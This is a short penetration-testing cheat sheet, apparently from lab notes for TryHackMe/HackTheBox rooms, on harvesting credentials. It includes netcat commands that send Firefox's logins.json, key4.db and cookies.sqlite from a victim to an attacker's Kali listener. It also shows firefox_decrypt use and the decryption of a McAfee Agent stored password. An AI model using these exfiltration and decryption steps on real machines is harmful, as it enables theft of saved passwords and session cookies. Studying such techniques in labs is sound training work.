Credential Harvesting

Browsers

Firefox

Common Areas

Location	Notes	Example
C:\Users\$USER\AppData\Roaming\Mozilla\Firefox\Profiles\	Depending on the version of Firefox there will be a folder with the files you need. ex: ljfn812a.default-release = Firefox 75.0	Gatekeeper

Exploit

GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub

Decrypt Credentials

Examples

Gatekeeper

Kali

We need to transfer the following files one by one.

nc -nlvp 1234 > logins.json
nc -nlvp 1234 > key4.db 
nc -nlvp 1234 > cert9.db 
nc -nlvp 1234 > cookies.sqlite

Victim

nc64.exe -nv $KALI 1234 < logins.json
nc64.exe -nv $KALI 1234 < key4.db 
nc64.exe -nv $KALI 1234 < cert9.db 
nc64.exe -nv $KALI 1234 < cookies.sqlite

This will show any passwords saved in Firefox

Kali

git clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt.py ./

Configuration Files

McAfee Agent

Examples

Configuration Files

Victim

cd C:\ProgramData\McAfee\Agent\DB

Victim

scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
Password: Password1@

Kali

sqlitebrowser ma.db

Kali

cp /root/Rooms/BreachingAD/task7/mcafeesitelistpwddecryption.zip .
unzip mcafeesitelistpwddecryption.zip

Kali

python2 mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py  jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

a